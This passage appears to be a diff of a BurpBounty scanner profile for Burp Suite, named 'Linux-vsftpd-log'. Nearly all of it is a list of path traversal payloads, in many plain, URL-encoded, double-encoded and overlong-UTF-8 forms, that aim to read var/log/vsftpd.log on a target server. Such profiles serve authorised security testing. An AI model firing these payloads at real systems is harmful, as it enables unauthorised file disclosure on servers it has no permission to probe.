2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","///%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","\\\\\\%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","..//{FILE}","..//..//{FILE}","..//..//..//{FILE}","..//..//..//..//{FILE}","..//..//..//..//..//{FILE}","..//..//..//..//..//..//{FILE}","..//..//..//..//..//..//..//{FILE}","..//..//..//..//..//..//..//..//{FILE}","..///{FILE}","..///..///{FILE}","..///..///..///{FILE}","..///..///..///..///{FILE}","..///..///..///..///..///{FILE}","..///..///..///..///..///..///{FILE}","..///..///..///..///..///..///..///{FILE}","..///..///..///..///..///..///..///..///{FILE}","..\\\\{FILE}","..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\\\{FILE}","..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","./\\/./{FILE}","./\\/././\\/./{FILE}","./\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",".\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","./../{FILE}","./.././../{FILE}","./.././.././../{FILE}","./.././.././.././../{FILE}","./.././.././.././.././../{FILE}","./.././.././.././.././.././../{FILE}","./.././.././.././.././.././.././../{FILE}","./.././.././.././.././.././.././.././../{FILE}",".\\..\\{FILE}",".\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".//..//{FILE}",".//..//.//..//{FILE}",".//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}","../{FILE}","../..//{FILE}","../..//../{FILE}","../..//../..//{FILE}","../..//../..//../{FILE}","../..//../..//../..//{FILE}","../..//../..//../..//../{FILE}","../..//../..//../..//../..//{FILE}","..\\{FILE}","..\\..\\\\{FILE}","..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\{FILE}","..\\..\\\\..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}","..///{FILE}","../..///{FILE}","../..//..///{FILE}","../..//../..///{FILE}","../..//../..//..///{FILE}","../..//../..//../..///{FILE}","../..//../..//../..//..///{FILE}","../..//../..//../..//../..///{FILE}","..\\\\\\{FILE}","..\\..\\\\\\{FILE}","..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,CONNECT:"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Linux-vsftpd-log","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"Linux-vsftpd-log listed","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Payload","match":"{FILE}","replace":"var/log/vsftpd.log","regex":"String"}],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}]
\ No newline at end of file
+[
+ {
+ "ProfileName": "Linux-vsftpd-log",
+ "Name": "",
+ "Enabled": true,
+ "Scanner": 1,
+ "Author": "@Sy3Omda",
+ "Payloads": [
+ "true,../{FILE}",
+ "true,../../{FILE}",
+ "true,../../../{FILE}",
+ "true,../../../../{FILE}",
+ "true,../../../../../{FILE}",
+ "true,../../../../../../{FILE}",
+ "true,../../../../../../../{FILE}",
+ "true,../../../../../../../../{FILE}",
+ "true,..%2f{FILE}",
+ "true,..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}",
+ "true,%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}",
+ "true,%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}",
+ "true,..%252f{FILE}",
+ "true,..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}",
+ "true,%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}",
+ "true,%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}",
+ "true,..\\{FILE}",
+ "true,..\\..\\{FILE}",
+ "true,..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..\\..\\..\\..\\..\\..\\..\\..\\{FILE}",
+ "true,..%255c{FILE}",
+ "true,..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}",
+ "true,..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}",
+ "true,%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\%2e%2e\\{FILE}",
+ "true,%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}",
+ "true,%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\%252e%252e\\{FILE}",
+ "true,%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}",
+ "true,..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af{FILE}",
+ "true,%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/{FILE}",
+ "true,%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
+ "true,%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af{FILE}",
